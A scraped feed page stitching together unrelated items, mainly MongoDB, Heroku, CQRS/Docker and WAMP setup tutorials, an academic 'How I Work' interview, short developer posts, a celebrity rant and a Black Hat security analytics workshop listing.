                    Business Intelligence Platform: Tutorial Using MongoDB Aggregation Pipeline        
          In today’s data driven world, researches are busy answering interesting questions by churning through huge volumes of data. Some obvious challenges they face are due the sheer size of dataset that they have to deal with. In this article, we take a peek at a simple business intelligence platform implemented on top of the MongoDB Aggregation Pipeline.
                    I am Annelies Van de Ven and This is How I Work        
          Today, I have the pleasure of interviewing Annelies Van de Ven in the "How I Work" series. Annelies started out her academic career studying classical archaeology at the University of St Andrews, but soon found her way into reception and museum studies. Though her MA is in Ancient History and Archaeology, and she is currently doing a degree within the archaeology department at the University of Melbourne, she considers herself a proud interdisciplinary researcher and is currently doing a video project that focuses on possible interdisciplinary futures within the Faculty of Arts at her institution.

          Current Job: I am doing PhD full time as well as working as a university tutor, trench supervisor, research and curatorial assistant on a casual basis.
          Current Location: Istanbul, trying to get permissions to go excavate our site.
          Current mobile device: An iPhone 6 that was given to me as a combined birthday and graduation present.
          Current computer: A slightly dented HP Laptop, the sticker on the keyboard tells me it is an intel CORE i5.

          Can you briefly explain your current situation and research to us?

          I am currently a full time international PhD student on a university funded scholarship at the University of Melbourne. I just passed the 3rd year review hurdle, so I am nearing the end. I am currently set to submit in mid-September, and at this moment in March, have about 90% of my thesis written. The main issue at the moment is cutting words, editing my spelling/grammar, and finessing my appendixes and bibliography, which is going rather slowly.

          My research focuses on how museums can better present archaeological objects, for a more engaging visitor experience. I am looking specifically at the Cyrus Cylinder, analysing how people perceive it, and whether these perceptions have been addressed in its past and present display strategies.
          I live with my partner who completed his PhD in bio-chemical engineering last year and is currently working as a researcher at the university while I finish my thesis.

          What tools, apps and software are essential to your workflow?

          Well, Dropbox, Microsoft Outlook, Word, Excel and Powerpoint are pretty essential. I also have a fantastic app called Camera Scan, that means I can scan books in my office rather than having to spend hours hogging the printer.

          When I am teaching LMS, and Turnitin are the main tools I use, I don’t print out student essays unless I have to, I think I use up enough paper already.

          When I am in the field I use filemaker for databases, GIS or CartoDB for mapping, as well as Illustrator, Photoshop or Coreldraw for illustrations. There are a number of other individualised software packages for archaeologists that we use for our surveying, artefact processing and data analysis, but they are not in my field of expertise.

          For communicating I mainly use g-mail, but lately as more and more academics create social media accounts on Facebook and Twitter, I find more of my communication is going through those channels.

          What does your workspace setup look like?
          I am lucky in that my department guarantees us international research students a space throughout our candidature. However, I have changed office five times over the past 3 and a half years. I started on a part-time desk in an open plan area called the ‘research corner’. This was a communal space where early degree history, philosophy, classics and archaeology postgraduates were placed. There were no computers provided, but most of us had laptops and the library was not far off. The next year I was moved to a corridor in the attic. There were only 8 of us in the office, all classicists or archaeologists, and we were all given computers. However, the space was possum infested, and though they couldn’t get into our office space, others on our corridor were not so lucky, and we all suffered from the smell. The year after that I was moved to a different office on the floor below, which seemed far too large and grand for 2 grad students, we even had our own bookshelves. I was only able to stay there for 1 semester before the entire department was moved to a new building, Arts West. Here I was given a desk in an open plan space on the top floor right across from the printer, as shown in the photograph below. The views were fantastic, and the height of the desk could be re-adjusted but the number of people coming in and out was not particularly conducive to work.



          The latest move brought me to an office 2 floors below the open plan area, as shown in the photograph below. I now share this office with 2 other archaeologists, who are both wonderful to work with.



          After moving so many times I have learned to keep less stuff in my office, however this means that my desk at home has become increasingly cluttered and I have started working at the dining table rather than sitting at my desk when at home, see below. I also regularly try to switch it up and go work at a colleague’s house, in a café, or in one of the communal reading rooms on campus.



          What is your best advice for productive academic work?

          Erm… don’t listen to other people’s advice? Find what works for you.
          I have found over the years that the advice given by university staff and supervisors, doesn’t always match up with my personal experience. I don’t necessarily work better in silence, I do not write out full references while writing, I like working in a group setting, and I don’t work to a fixed schedule. These things work for me, but not for everyone. So try things out and see what works for you.

          How do you keep an overview of projects and tasks?
          I used to literally just have a piece of paper with a list of things I needed to do organised into rough themes. I loved crossing things off the list. However, I soon realised this was not the most efficient way of doing things, as I ended up having to re-write the list every few days, and ended up with about 5 different versions of it, so I now have a digital to do list that is organised based on deadline, priority and effort needed to complete them.

          Besides phone and computer, do you use other technological tools in work and daily life?
          I have a kindle, that I love. I moved around a lot as a kid, and the worst thing about moving was always that I had to throw out books. The kindle means I can take my books with me and it doesn’t take up all my luggage space. I still prefer physical copies, but the kindle gets a close second, especially as mine lets me annotate my books, making it useful for academic reading as well.

          Which skill makes you stand out as an academic?
          I tend to say yes, and I am good with deadlines. I have been told these are not necessarily common traits amongst academics. I have a lot on my plate, but I actually like it that way, it makes me feel like I am accomplishing things and contributing to a wider community of research, teaching and outreach. Sometimes this can be stressful, and I often get advised to only do projects that are directly related to my research or to some kind of monetary/position gain. However, I think that all these project enrich my research, they give me skills and contacts I would not have otherwise, and they give me more tangible outcomes than my long term thesis research, which helps motivate me to continue. They have also taught me the value of doing things to a strict deadline. If you are juggling a lot of projects, it is important to get the high priority ones out of the way fast, so you don’t end up eating into the time you are meant to spend on other things.

          What do you listen to when you work?
          It really depends on my mood and on what I am working on. While I am reading I tend to not listen to anything. While writing it can be anything from instrumental movie soundtracks, to rap or even country music. Lately I have been listening to a lot of Broadway musical soundtracks. Often I just need something to get me going and then to keep me motivated. I tend to get bored easily, so music actually makes me more likely to keep at it when I am not feeling particularly inspired.

          What are you currently reading? How do you find time for reading?

          I just finished an amazing book by Joseph Assaf called ‘In Someone Else’s Shoes’. It tells the story of a Lebanese Australian man who built a successful career around the advocating for the significance of cross-cultural empathy in the business world. It is a fantastic read.

          The next book on my list is Ken Robinson’s ‘Creative Schools’. It has been described to me as a manifesto for engaged educational programs.

          I find it very difficult to find time to read during a regular work week. It is not that I don’t have any spare time, but I tend to want to fill it with other things, after a full day of sitting in my office reading and typing. When I do make time for reading I often end up feeling guilty about reading non-thesis related things.

          Are you more of an introvert or extrovert? How does this influence your working habits?
          I am definitely more of an extrovert. I get very frustrated when alone with my own thoughts. I have less of an issue with having leisure time on my own, I can watch a movie, read, go for a run, but when I am doing work, I find being alone to be difficult. Research is already such an isolating experience, particularly at PhD level. In order to avoid daily meltdowns, I try to work with others, and allocate time to discussing my work in a group. The danger with this is that these discussion sessions can sometimes go on far longer than expected, but I’d prefer to lose a day of work to exchanging ideas with colleagues, than to lose one to a burn out.

          What's your sleep routine like?
          When I am alone at home, which happens for about 1 to 2 months a year nowadays, I tend to wake up around 10am and work until about 2 or 3am. I am definitely not a morning person and I find night times to be oddly productive, particularly for writing. Unfortunately, this schedule doesn’t really line up with normal university working hours, and my partner has a 9-5 university job, so when he is around I try to adapt to his schedule and sleep from about 11pm to 7am. It still feels slightly wrong to me, though I seem to be in the minority on this one.

          What's your work routine like?
          This varies so much depending on what projects I am working on and whether or not I am teaching. I tend to do administrative work in the morning, as I don’t feel I am at my full research capacity, and I always seem to have more than enough forms and emails to keep me busy for a few hours every day. Then around lunch (11 to about 3) is when most of my meetings, social or work related, happen, so there is a lot of flitting around across campus and the city. Once I get back to the office I then get into reading and writing, until around 5:30 when I take a short break to go for a run or walk followed by dinner. Then if I have nothing else planned for the evening I continue to do writing, reading, or if I am feeling really out of it referencing or editing until around 10. If I am working on an exhibition, or a class, I am much more focused, as there tends to be a tighter deadline involved, particularly when there is marking to do.

          What's the best advice you ever received?
          If you have something that you want to or need to do, don’t just leave it until tomorrow, tomorrow there will be new things to do, new opportunities and new hindrances.
                    Pravni svetovalec za upravljanje problematičnih naložb        
          Vaše naloge bodo med drugim pravno svetovanje vsem oddelkom družbe, sestava listin, pogodb in pravnih mnenj, spremljanje zakonodaje in drugih predpisov, ki zadevajo poslovanje družbe, sodelovanje in koordiniranje poslovanja z odvetniki in/ali notarji, spremljanje relevantnih objav na AJPES...
                    Deploy Your Own REST API in 30 Mins Using mLab and Heroku        

          This article was first published on the Heroku Dev Center

          The MEAN stack is a popular web development stack made up of MongoDB, Express, AngularJS, and Node.js. MEAN has gained popularity because it allows developers to program in JavaScript on both the client and the server. The MEAN stack enables a perfect harmony of JavaScript Object Notation (JSON) development: MongoDB stores data in a JSON-like format, Express and Node.js facilitate easy JSON query creation, and AngularJS allows the client to seamlessly send and receive JSON documents.

          [author_more]

          MEAN is generally used to create browser-based web applications because AngularJS (client-side) and Express (server-side) are both frameworks for web apps. Another compelling use case for MEAN is the development of RESTful API servers. Creating RESTful API servers has become an increasingly important and common development task, as applications increasingly need to gracefully support a variety of end-user devices, such as mobile phones and tablets. This tutorial will demonstrate how to use the MEAN stack to rapidly create a RESTful API server.

          AngularJS, a client-side framework, is not a necessary component for creating an API server. You could also write an Android or iOS application that runs on top of the REST API. We include AngularJS in this tutorial to demonstrate how it allows us to quickly create a web application that runs on top of the API server.

          The application we will develop in this tutorial is a basic contact management application that supports standard CRUD (Create, Read, Update, Delete) operations. First, we'll create a RESTful API server to act as an interface for querying and persisting data in a MongoDB database. Then, we'll leverage the API server to build an Angular-based web application that provides an interface for end users. Finally, we will deploy our app to Heroku.

          So that we can focus on illustrating the fundamental structure of a MEAN application, we will deliberately omit common functionality such as authentication, access control, and robust data validation.

          Prerequisites

          To deploy the app to Heroku, you'll need a Heroku account. If you have never deployed a Node.js application to Heroku before, we recommend going through the Getting Started with Node.js on Heroku tutorial before you begin.

          Also, ensure that you have the following installed on your local machine:

          Source Code Structure

          The source code for this project is available on GitHub at https://github.com/sitepoint-editors/mean-contactlist. The repository contains:

          • package.json — a configuration file that contains metadata about your application. When this file is present in the root directory of a project, Heroku will use the Node.js buildpack.
          • app.json — a manifest format for describing web apps. It declares environment variables, add-ons, and other information required to run an app on Heroku. It is required to create a "Deploy to Heroku" button.
          • server.js — this file contains all of our server-side code, which implements our REST API. It's written in Node.js, using the Express framework and the MongoDB Node.js driver.
          • /public directory — this directory contains all of the client-side files which includes the AngularJS code.

          See the Sample Application Running

          To see a running version of the application this tutorial will create, you can view our running example here: https://sleepy-citadel-45065.herokuapp.com/

          Now, let's follow the tutorial step by step.

          Create a New App

          Create a new directory for your app and use the cd command to navigate to that directory. From this directory, we'll create an app on Heroku which prepares Heroku to receive your source code. We'll use the Heroku CLI to get started.

          $ git init
          Initialized empty Git repository in /path/.git/
          $ heroku create
          Creating app... done, stack is cedar-14
          https://sleepy-citadel-45065.herokuapp.com/ | https://git.heroku.com/sleepy-citadel-45065.git
          

          When you create an app, a git remote (called heroku) is also created and associated with your local git repository. Heroku also generates a random name (in this case sleepy-citadel-45065) for your app.

          Heroku recognizes an app as Node.js by the existence of a package.json file in the root directory. Create a file called package.json and copy the following into it:

          {
            "name": "MEAN",
            "version": "1.0.0",
            "description": "A MEAN app that allows users to manage contact lists",
            "main": "server.js",
            "scripts": {
              "test": "echo \"Error: no test specified\" && exit 1",
              "start": "node server.js"
            },
            "dependencies": {
              "body-parser": "^1.13.3",
              "express": "^4.13.3",
              "mongodb": "^2.1.6"
            }
          }
          

          The package.json file determines the version of Node.js that will be used to run your application on Heroku, as well as the dependencies that should be installed with your application. When an app is deployed, Heroku reads this file and installs the appropriate Node.js version together with the dependencies using the npm install command.

          To prepare your system for running the app locally, run this command in your local directory to install the dependencies:

          $ npm install
          

          After dependencies are installed, you will be ready to run your app locally.

          Provision a MongoDB Database

          After you set up your application and file directory, create a MongoDB instance to persist your application's data. We'll use the mLab hosted database, a fully managed MongoDB service, to easily provision a new MongoDB database:

          When you create a mLab database, you will be given a MongoDB connection string. This string contains the credentials to access your database, so it's best practice to store the value in a config variable. Let's go ahead and store the connection string in a config var called MONGOLAB_URI:

          heroku config:set MONGOLAB_URI=mongodb://your-user:your-pass@host:port/db-name
          

          You can access this variable in Node.js as process.env.MONGOLAB_URI, which we will do later.

          Now that our database is ready, we can start coding.

          Connect MongoDB and the App Server Using the Node.js Driver

          There are two popular MongoDB drivers that Node.js developers use: the official Node.js driver and an object document mapper called Mongoose that wraps the Node.js driver (similar to a SQL ORM). Both have their advantages, but for this example we will use the official Node.js driver.

          Continue reading %Deploy Your Own REST API in 30 Mins Using mLab and Heroku%


                    Min GitHub sida        
          Just nu har jag bara ett projekt upplagt. Det är ett MVC-ramverk gjort i PHP. Istället för att ha stöd för en klassisk SQL databas har jag valt att använda NoSql databasen MongoDB. Varför det blev just MongoDb är för att den är snabb och flexibel. https://github.com/Sprattel/
                    åŸºäºŽSpring Boot, Axon CQRS/ES,和Docker构建微服务        
          这是一个使用Spring Boot和Axon以及Docker构建的Event Sorucing源码项目,技术特点:
          1.使用Java 和Spring Boot实现微服务;
          2.使用命令和查询职责分离 (CQRS) 和 Event Sourcing (ES) 的框架Axon Framework v2, MongoDB 和 RabbitMQ;
          3.使用Docker构建 交付和运行;
          4.集中配置和使用Spring Cloud服务注册;
          5.使用Swagger 和 SpringFox 提供API文档

          项目源码:GitHub

          工作原理:
          这个应用使用CQRS架构模式构建,在CQRS命令如ADD是和查询VIEW(where id=1)分离的,在这个案例中领域部分代码已经分离成两个组件:一个是属于命令这边的微服务和属性查询这边的微服务。

          微服务是单个职责的功能,自己的数据存储,每个能彼此独立扩展部署。

          属于命令这边的微服务和属性查询这边的微服务都是使用Spring Boot框架开发的,在命令微服务和查询微服务之间通讯是事件驱动,事件是通过RabbitMQ消息在微服务组件之间传递,消息提供了一种进程节点或微服务之间可扩展的事件载体,包括与传统遗留系统或其他系统的松耦合通讯都可以通过消息进行。

          请注意,服务之间不能彼此共享数据库,这是很重要,因为微服务应该是高度自治自主的,这样反过来有助于服务能够彼此独立地扩展伸缩规模。

          CQRS中命令是“改变状态的动作”。命令的微服务包含所有领域逻辑和业务规则,命令被用于增加新的产品或改变它们的状态,这些命令针对某个具体产品的执行会导致事件Event产生,这会通过Axon框架持久化到MongoDB中,然后通过RabbitMQ传播给其他节点进程或微服务。

          在event-sourcing中,事件是状态改变的原始记录,它们用于系统来重新建立实体的当前状态(通过重新播放过去的事件到当前就可以构建当前的状态),这听上去会很慢,但是实际上,事件都很简单,执行非常快,也能采取‘快照’策略进行优化。

          请注意,在DDD中,实体是指一个聚合根实体。

          上面是命令这边的微服务,下面看看查询这边的微服务:
          查询微服务一般扮演一种事件监听器和视图角色,它监听到命令那边发出的事件,然后处理它们以符合查询这边的要求。

          在这个案例中,查询这边只是简单建立和维持了一个 ‘materialised view’或‘projection’ ,其中保留了产品的最新状态,也就是产品id和描述以及是否被卖出等等信息,查询这边能够被复制多次以方便扩展,消息可以保留在RabbitMQ队列中实现持久保存,这种临时保存消息方式可以防止查询这边微服务当机。

          命令微服务和查询微服务两者都有REST API,提供外界客户端访问。

          下面看看如何通过Docker运行这个案例,需要 Ubuntu 16.04:
          1.Docker ( v1.8.2)
          2.Docker-compose ( v1.7.1)

          在一个空目录,执行下面命令下载docker-compose:

          $ wget https://raw.githubusercontent.com/benwilcock/microservice-sampler/master/docker-compose.yml
          注意:不要更改文件名称。

          启动微服务:只是简单一个命令:

          $ docker-compose up

          你会看到许多下载信息和日志输出在屏幕上,这是Docker image将被下载和运行。一共有六个docker,分别是: ‘mongodb’, ‘rabbitmq’, ‘config’, ‘discovery’, ‘product-cmd-side’, 和 ‘product-qry-side’.

          使用下面命令进行测试增加一个新产品:

          $ curl -X POST -v --header "Content-Type: application/json" --header "Accept: */*" "http://localhost:9000/products/add/1?name=Everything%20Is%20Awesome"

          查询这个新产品:

          $ curl http://localhost:9001/products/1

          Microservices With Spring Boot, Axon CQRS/ES, and Docker



                    windows下的WAMP环境搭建图文教程(推荐)        

          本篇文章主要是讲一下我自己安装wamp环境的一些步骤和见解,前方多图预警,慎入!!!!!

          php运行环境 :

          linux下的三种安装方式:源码包安装、rpm包安装、集成环境安装(lnmp)

          windows安装的两种方式:单个下载安装、集成环境安装(AppServ,phpstudy,wamp)

          在Windows系统上安装PHP开发环境:

          所需软件分别独立安装:

          安装前准备

          安装Apache

          安装mysql

          安装PHP

          安装phpMyA




          软件名称



          下载地址





          Apache下载



          http://httpd.apache.org/download.cgi





          PHP下载



          http://www.php.net/downloads.php





          MySQL



          http://dev.mysql.com/downloads/mysql/,此处选择的为免安装版





          phpMyAdmin



          http://www.phpmyadmin.net




          apache环境安装:

          双击httpd-2.2.21-win32-x86-no_ssl.msi开始安装。出现安装欢迎界面。

          windows下的WAMP环境搭建图文教程(推荐)

          直接点“Next”继续,出现授权协议。

          windows下的WAMP环境搭建图文教程(推荐)

          选择“I accept the terms in the license agreement”同意授权协议,然后点“Next”继续,出现安装说明。

          windows下的WAMP环境搭建图文教程(推荐)

          直接点“Next”下一步,出现填写信息界面。

          windows下的WAMP环境搭建图文教程(推荐)

          “Network Domain”填写你的网络域名,比如admin10000.com,如果没有网络域名,可以随便填写。

          “Server Name”填写你的服务器名,比如 www.admin10000.com,也就是主机名。没有的话可以随便填写。

          “Administrator's Email Address”填写系统管理员的联系电子邮件地址,比如webmaster@admin10000.com。联系电子邮件地址会在当系统故障时提供给访问者。

          提示:因为我们安装apache主要是在本机上做开发,所以前2项填写localhost即可。以上3项信息可以任意填写,以后可以在httpd.conf文件中修改这些信息。

          下面还有两个选择,第一个是为系统所有用户安装,使用默认的80端口,并作为系统服务自动启动;另外一个是仅为当前用户安装,使用端口8080,手动启动。我们选择第一个“for All Users, on Port 80, as a Service C Recommended”。然后点击“Next”继续。

          windows下的WAMP环境搭建图文教程(推荐)

          出现选择安装类型界面,Typical为典型安装,Custom为用户定制安装,我们这里选择Typical,按“Next”继续。

          windows下的WAMP环境搭建图文教程(推荐)

          点击“Change...”,手动指定安装目录。这里我们把Apache安装到了“D:\Apache\”,安装哪里你自己决定。建议不要安装在操作系统所在盘(通常是C盘),免得操作系统坏了之后,还原操作把Apache配置文件也清除了。指定好安装目录后,点“Next”继续。

          windows下的WAMP环境搭建图文教程(推荐)

          确认安装选项无误,点“Install”开始安装。如果您认为要再检查一遍,可以点“Back”一步步返回检查。

          windows下的WAMP环境搭建图文教程(推荐)

          出现安装进度,等待一会,然后出现下面的界面。

          windows下的WAMP环境搭建图文教程(推荐)

          点击“Finish”后,在右下角状态栏会出现一个带绿色标志的图标。

          windows下的WAMP环境搭建图文教程(推荐)

          表示Apache已经正常启动。

          这时候在浏览器输入http://localhost/ 或者http://127.0.0.1/可以看到如下界面。

          windows下的WAMP环境搭建图文教程(推荐)

          MYSQL安装:

          打开下载的mysql安装文件mysql-5.0.27-win32.zip,双击解压缩,运行“setup.exe”,出现如下界面

          windows下的WAMP环境搭建图文教程(推荐)

          直接点“Next”继续,出现授权协议。

          windows下的WAMP环境搭建图文教程(推荐)

          选择“I accept the terms in the license agreement”同意授权协议,然后点“Next”继续,在出现选择安装类型的窗口中,有“typical(默认)”、“Complete(完全)”、“Custom(用户自定义)”三个选项,我们选择“Custom”,因为通过自定义可以更加的让我们去熟悉它的安装过程,对于学习MySQL数据库很有帮助,单击“next”继续安装,如图所示:

          windows下的WAMP环境搭建图文教程(推荐)

          在出现自定义安装界面中选择mysql数据库的安装路径,这里我设置的是“d:\Program File\MySQL”,单击“next”继续安装,如图所示:

          windows下的WAMP环境搭建图文教程(推荐)

          接下来进入到准备安装的界面,首先确认一下先前的设置,如果有误,按“back”返回,没有错误,单击“Install”按钮继续安装,如图所示:

          windows下的WAMP环境搭建图文教程(推荐)

          单击“Install”按钮之后出现如下正在安装的界面,经过很少的时间,MySQL数据库安装完成,出现完成MySQL安装的界面,如图所示:

          windows下的WAMP环境搭建图文教程(推荐)

          这个界面单击“next”就行。

          windows下的WAMP环境搭建图文教程(推荐)
          windows下的WAMP环境搭建图文教程(推荐)

          注意要选择上边的“Launch the MySQL Instance Configuration Wizard”选项,这是要启动MySQL的配置,也是最关键的地方(也可以以后设置),单击“Finish”按钮,进入到配置界面。

          MySQL数据库的安装十分简单,关键是安装完成之后的配置,单击完成之后出现如下的配置界面向导,单击“next”进行配置,如图所示:

          windows下的WAMP环境搭建图文教程(推荐)

          在打开的配置类型窗口中选择配置的方式,“Detailed Configuration(手动精确配置)”、“Standard Configuration(标准配置)”,为了熟悉过程,我们选择“Detailed Configuration(手动精确配置)”,单击“next”继续,如图所示:

          windows下的WAMP环境搭建图文教程(推荐)

          在出现的窗口中,选择服务器的类型,“Developer Machine(开发测试类)”、“Server Machine(服务器类型)”、“Dedicated MySQL Server Machine(专门的数据库服务器)”,我们仅仅是用来学习和测试,默认就行,单击“next”继续,如图所示:

          windows下的WAMP环境搭建图文教程(推荐)

          在出现的配置界面中选择mysql数据库的用途,“Multifunctional Database(通用多功能型)”、“Transactional Database Only(服务器类型)”、“Non-Transactional Database Only(非事务处理型)”,这里我选择的是第一项, 通用安装,单击“next”继续配置,如图所示:

          windows下的WAMP环境搭建图文教程(推荐)

          在出现的界面中,进行对InnoDB Tablespace进行配置,就是为InnoDB 数据库文件选择一个存储空间,如果修改了,要记住位置,重装的时候要选择一样的地方,否则可能会造成数据库损坏,当然,对数据库做个备份就没问题了,如图所示:

          windows下的WAMP环境搭建图文教程(推荐)

          在打开的页面中,选择mysql的访问量,同时连接的数目,“Decision Support(DSS)/OLAP(20个左右)”、“Online Transaction Processing(OLTP)(500个左右)”、“Manual Setting(手动设置,设置为15个)这里选择手动设置,单击“next”继续,如图所示:

          windows下的WAMP环境搭建图文教程(推荐)

          Mysql默认情况下启动TCP/IP网络,端口号为3306,如果不想使用这个端口号,也可以通过下拉列表框更改,但必须保证端口号没有被占用。Add filewall exception for this Port 复选框用来在防火墙上注册这个端口号,在这里选择该选项,Enable Strict Mode 复选框用来启动MYSQL标准模式,这样MYSQL就会对输入的数据进行严格的检查,不允许出现微小的语法错误,对于初学者来说不建议选择该项,以免带来麻烦,我这里是给勾选上了,可以不选择该选项,单击“next”继续,如图所示:

          windows下的WAMP环境搭建图文教程(推荐)

          在打开的字符编码的页面中,设置mysql要使用的字符编码,第一个是西文编码,第二个是多字节的通用utf8编码,第三个是手动,我们选择utf-8,如果在这里没有选择UTF-8这个编码的化,在使用JDBC连接数据库的时候,便会出现乱码,到那时需要加上如下的代码“useUnicode=true&characterEncoding=UTF-8 ”,才可以解决乱码问题,为了以后的方便所以设置为UTF-8编码,但是有一个问题,那就是当用哪个控制台插入汉字的时候,会报错,查询带汉字的表时,无法显示汉字,所在需要在每次进入MySQL后,设置一个系统参数“set names gbk”,即可解决该问题,接下来单击“next”,继续配置,如图所示:

          windows下的WAMP环境搭建图文教程(推荐)

          在打开的页面中选择是否将mysql安装为windows服务,还可以指定Service Name(服务标识名称),是否将mysql的bin目录加入到Windows PATH(加入后,就可以直接使用bin下的文件,而不用指出目录名,比如连接,“mysqlCu username Cp password;”就可以了,单击“next”继续配置,如图所示:

          windows下的WAMP环境搭建图文教程(推荐)

          在打开的页面中设置是否要修改默认root用户(超级管理员)的密码(默认为空),“New root password”,如果要修改,就在此填入新密码,并启用root远程访问的功能,不要创建匿名用户,单击“next”继续配置,如图所示:

          windows下的WAMP环境搭建图文教程(推荐)

          到这里所有的配置操作都已经完成,单击Execute按钮执行配置,如图所示:

          windows下的WAMP环境搭建图文教程(推荐)

          过了几分钟,出现如下的提示界面就代表MySQL配置已经结束了,并提示了成功的信息。

          windows下的WAMP环境搭建图文教程(推荐)

          在服务中将mysql数据库启动,并在命令窗口中输入“mysql Ch localhost Cu root -p”或者是“mysql -h localhost -uroot -p密码”,接着在出现的提示中输入用户的密码,如图所示:

          windows下的WAMP环境搭建图文教程(推荐)

          PHP环境安装:

          A、安装Apache

          B、安装PHP(只需要将压缩包解压到相应的位置即可)

          C、PHP配置

          将php.ini-dist更名为php.ini 修改486和

          extension_dir = "D:/php-5.2.6/ext"

          D、配置Apache配置文件httpd.conf

          #加载PHP模块

          LoadModule php5_module "D:/php-5.2.6/php5apache2_2.dll"

          #PHP配置文件所在位置

          PHPIniDir "D:/php-5.2.6"

          #哪些类型的文件将交由PHP引擎处理

          AddType application/x-httpd-php .php

          E、重启Apache

          修改httpd.conf配置文件

          a)修改第177行重新设置文档根目录

          DocumentRoot "D:/ftp/Public/www"

          b)修改第244行将网站目录与文档根目录设为一致

          <Directory "D:/ftp/Public/www">

          c)修改第187行设置网站根目录访问权限

          <Directory />

          Options FollowSymLinks

          AllowOverride None

          Order allow,deny

          Allow from all

          </Directory>

          d)修改第240行设置网站默认文档(如果设置的html文档不存在,则会列出网站根目录下的所有文件)

          DirectoryIndex abc.html

          e)重启apache服务

          PHP配置

          LoadModule php5_module "D:\Program Files (x86)\Apache Software Foundation\php5.2.6\php5apache2_2.dll"

          PHPIniDir "D:\Program Files (x86)\Apache Software Foundation\php5.2.6"

          AddType application/x-httpd-php .php

          这样就安装好了,还是挺简单的,就是步骤有点多,累死我了。感觉有问题的请多多指教。

          以上这篇windows下的WAMP环境搭建图文教程(推荐)就是小编分享给大家的全部内容了,希望能给大家一个参考,也希望大家多多支持脚本之家。


                    Request Log - RubyGem for Logging Rack (Rails) Web Requests to MongoDB        

          Prompted by the fact that Heroku doesn't keep the Rails request logs around I went out looking for a logging solution. What I've ended up with is Request Log - a simple RubyGem for logging web requests to MongoDB.

          My experiences with logging to MongoDB so far have been very positive. I see big potential in logging web requests to a database. The reason MongoDB is so well suited for the task is its high performance and strong query capabilities. This allows you to do advanced queries such as "give me all requests in this time period, with this response, status, this execution time, these parameters etc.". Each web request becomes a document in MongoDB and if you choose your database fields wisely you have a great tool at your disposal for statistics, monitoring, and debugging etc.

          I'm curious to see how we'll be able to design and use our web request logs in the project I'm currently in. I'll report back here any interesting findings that we make.


                    Rails Counter Cache Updates Leading to MySQL Deadlock        

          I've gotten a few error messages lately where a plain vanilla ActiveRecord counter cache update (update_counters_without_lock method) has lead to an error being thrown from Mysql - "Mysql::Error: Deadlock found when trying to get lock; try restarting transaction: UPDATE `events` SET `attendees_count` = COALESCE(`attendees_count`, 0) + 1 WHERE (`id` = 1067)".

          It seems someone else has tried to report this as a bug but Mysql is saying that it's a feature and is referring to the lock modes documentation. There is some interesting info on deadlocks in InnoDB over at rubyisms. I haven't had time to dig into the theory though. Has anybody else had this issue? What can be done about it (other than switch to PostgreSQL)?


                    How to Install MongoDB (2.0.3) on openSUSE 12.1        

          MongoDB is an open source, document-oriented database designed with both scalability and developer agility in mind. Instead of storing your data in tables and rows as you would with a relational database, in MongoDB you store JSON-like documents with dynamic schemas. The goal of MongoDB is to bridge the gap between key-value stores (which are…

          The post How to Install MongoDB (2.0.3) on openSUSE 12.1 appeared first on IT'zGeek -.


                    LET'S HAVE A TOAST...        




          Let's have a toast for all the assholes and all the barefoot white girls that want to milk any sympathy that those assholes generated for them, until the last drop. I mean, it was an awards show stunt. These sort of things happen all the time. You didn't see puffy making subliminal references to ODB at the American Music Awards a year after Dirt McGirt stormed the stage during Diddy's acceptance speech to inform the audience that "Wu Tang is for the kids!" Yeah Ye was a jackass for doing it, but he did it and Swift still got her chance to finish her speech (thanks to Beyonce). In the words of Lord Voldemort (via twitter) "Dear Taylor Swift. He stole your microphone. It's been a year. Get over it. It's not like he broke up with you on the phone or something..."

          -Noface
                    Security Analytics - Visualization - Big Data Workshop Black Hat 2017        


          VISUAL ANALYTICS – DELIVERING ACTIONABLE SECURITY INTELLIGENCE


          BlackHat 2017 - Las Vegas


          Big Data is Getting Bigger - Visualization is Getting Easier - Learn How!
          Dates: July 22-23 & 24-25
          Location: Las Vegas, USA

          SIGN UP NOW


          OVERVIEW

          Big data and security intelligence are the two very hot topics in security. We are collecting more and more information from both the infrastructure, but increasingly also directly from our applications. This vast amount of data gets increasingly hard to understand. Terms like map reduce, hadoop, spark, elasticsearch, data science, etc. are part of many discussions. But what are those technologies and techniques? And what do they have to do with security analytics/intelligence? We will see that none of these technologies are sufficient in our quest to defend our networks and information. Data visualization is the only approach that scales to the ever changing threat landscape and infrastructure configurations. Using big data visualization techniques, you uncover hidden patterns of data, identify emerging vulnerabilities and attacks, and respond decisively with countermeasures that are far more likely to succeed than conventional methods. Something that is increasingly referred to as hunting. The attendees will learn about log analysis, big data, information visualization, data sources for IT security, and learn how to generate visual representations of IT data. The training is filled with hands-on exercises utilizing the DAVIX live CD.



          What's New?

          The workshop is being heavily updated over the next months. Check back here to see a list of new topics:

          • Security Analytics - UEBA, Scoring, Anomaly Detection
          • Hunting
          • Data Science
          • 10 Challenges with SIEM and Big Data for Security
          • Big Data - How do you navigate the ever growing landscape of Hadoop and big data technologies? Tajo, Apache Arrow, Apache Drill, Druid, PrestoDB from Facebook, Kudu, etc. We'll sort you out.


          SYLLABUS

          The syllabus is not 100% fixed yet. Stay tuned for some updates.

          Day 1:

          Log Analysis

          • Data Sources Discussion - including PCAP, Firewall, IDS, Threat Intelligence (TI) Feeds, CloudTrail, CloudWatch, etc.
          • Data Analysis and Visualization Linux (DAVIX)
          • Log Data Processing (CSVKit, ...)

          SIEM, and Big Data

          • Log Management and SIEM Overview
          • LogStash (Elastic Stack) and Moloch
          • Big Data - Hadoop, Spark, ElasticSearch, Hive, Impala

          Data Science

          • Introduction to Data Science
          • Introduction to Data Science with R
          • Hunting

          Day 2:

          Visualization

          • Information Visualization History
          • Visualization Theory
          • Data Visualization Tools and Libraries (e.g., Mondrian, Gephi, AfterGlow, Graphiti)
          • Visualization Resources

          Security Visualization Use-Cases

          • Perimeter Threat
          • Network Flow Analysis
          • Firewall Visualization
          • IDS/IPS Signature Analysis
          • Vulnerability Scans
          • Proxy Data
          • User Activity
          • Host-based Data Analysis



          Sample of Tools and Techniques

          Tools to gather data:

          • argus, nfdump, nfsen, and silk to process traffic flows
          • snort, bro, suricata as intrusion detection systems
          • p0f, npad for passive network analysis
          • iptables, pf, pix as examples of firewalls
          • OSSEC, collectd, graphite for host data

          We are also using a number of visualization tools to analyze example data in the labs:

          • graphviz, tulip, cytoscape, and gephi
          • afterglow
          • treemap
          • mondrian, ggobi

          Under the log management section, we are going to discuss:

          • rsyslog, syslog-ng, nxlog
          • logstash as part of the elastic stack, moloch
          • commercial log management and SIEM solutions

          The section on big data is covering the following:

          • hadoop (HDFS, map-reduce, HBase, Hive, Impala, Zookeper)
          • search engines like: elastic search, Solr
